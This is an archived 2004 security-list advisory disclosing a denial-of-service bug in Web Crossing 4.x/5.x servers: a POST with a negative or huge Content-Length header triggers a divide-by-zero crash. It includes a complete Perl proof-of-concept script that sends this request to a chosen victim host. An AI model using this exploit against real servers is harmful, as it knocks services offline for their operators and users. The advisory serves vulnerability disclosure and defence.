lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Tue, 03 Feb 2004 20:08:07 +0000
From: "Peter Winter-Smith" <peter4020@...mail.com>
To: vulnwatch@...nwatch.org
Cc: vuln@...unia.com
Subject: Web Crossing 4.x/5.x Denial of Service Vulnerability


Web Crossing 4.x/5.x Denial of Service Vulnerability

###################################################

Credit:
Author     : Peter Winter-Smith

Software:
Package    : Web Crossing
Versions   : 4.x/5.x
Vendor     : WebCrossing, Inc.
Vendor Url : http://www.webcrossing.com/

Vulnerability:
Bug Type   : Denial of Service
Severity   : Less Critical


1. Description of Software

"Web Crossing is the world's leading collaboration server platform,
offering complete solutions including discussion groups/bulletin boards,
integrated newsgroups and mailing lists, full email services, calendar
services, real-time chats, live events and full web application
programming features, complete cross-platform compatibility, and
distributed/mirrored serving for ultimate scaleability."
- Vendors Description


2. Bug Information

(a). Denial of Service

When an HTTP POST request is made to Web Crossing's built-in server
application (default port 80/tcp), if the 'Content-Length' header supplied
with the request is an extremely large or negative number, the server
will encounter a set of instructions which lead to an integer-divide-by-
zero problem, immediately crashing the server and denying any further
service.

The offending instruction is located at 0090121F:


0090121F   F7F9             IDIV ECX



3. Proof of Concept

The following perl script should crash any Web Crossing BBS using the
built-in server application for hosting:


#########################################################################
#!/usr/bin/perl -w
#
# Web Crossing 4.x\5.x Denial of Service Exploit
#  [ Bad 'Content-Length' Header Bug ]
#
#  - by Peter Winter-Smith [peter4020@...mail.com]

use IO::Socket;

if(!($ARGV[0]))
{
print "Usage: wxdos.pl <victim>\n";
exit;
}

print "Web Crossing 4.x\\5.x Denial of Service Exploit\n" .
      "\t[ Bad 'Content-Length' Header Bug ]\n" .
      "\t[peter4020\@hotmail.com]\n\n";

$victim = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>$ARGV[0],
                             PeerPort=>"80")
                            or die "Unable to connect to $ARGV[0] on " .
                             "port 80";


$DoS    = "POST / HTTP/1.1\r\n" .
          "Content-Length: -1\r\n\r\n";

print $victim $DoS;

print "[+] Evil request made to target server ... Waiting...!\n";

sleep(4);

close($victim);

print "[+] Done!\n";
exit;
#########################################################################


4. Patches - Workarounds

Although I was able to contact the Web Crossing support staff, when the
investigation into this flaw was handed over to the development team all
contact was lost with both them and the support staff and my emails were
no-longer answered. I have decided to release this information so that
users of Web Crossing can decide what would be a suitable course of action
for protecting their systems from this bug.

No vendor supplied patches exist, I would recommend that filtering of the
'Content-Length' header is put into action via some third party
application if at all possible.


5. Credits

    The discovery, analysis and exploitation of this flaw is a result of
research carried out by Peter Winter-Smith. I would ask that you do not
regard any of the analysis to be 'set in stone', and that if investigating
this flaw you back trace the steps detailed earlier for yourself.

Greets and thanks to:
    David and Mark Litchfield, JJ Gray (Nexus), Todd and all the
packetstorm crew, Luigi Auriemma, Bahaa Naamneh, sean(gilbert(perlboy)),
pv8man, nick k., Joel J. and Martine.

o This document should be mirrored at
                   http://www.elitehaven.net/webxdos.txt

_________________________________________________________________
Sign-up for a FREE BT Broadband connection today! 
http://www.msn.co.uk/specials/btbroadband

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ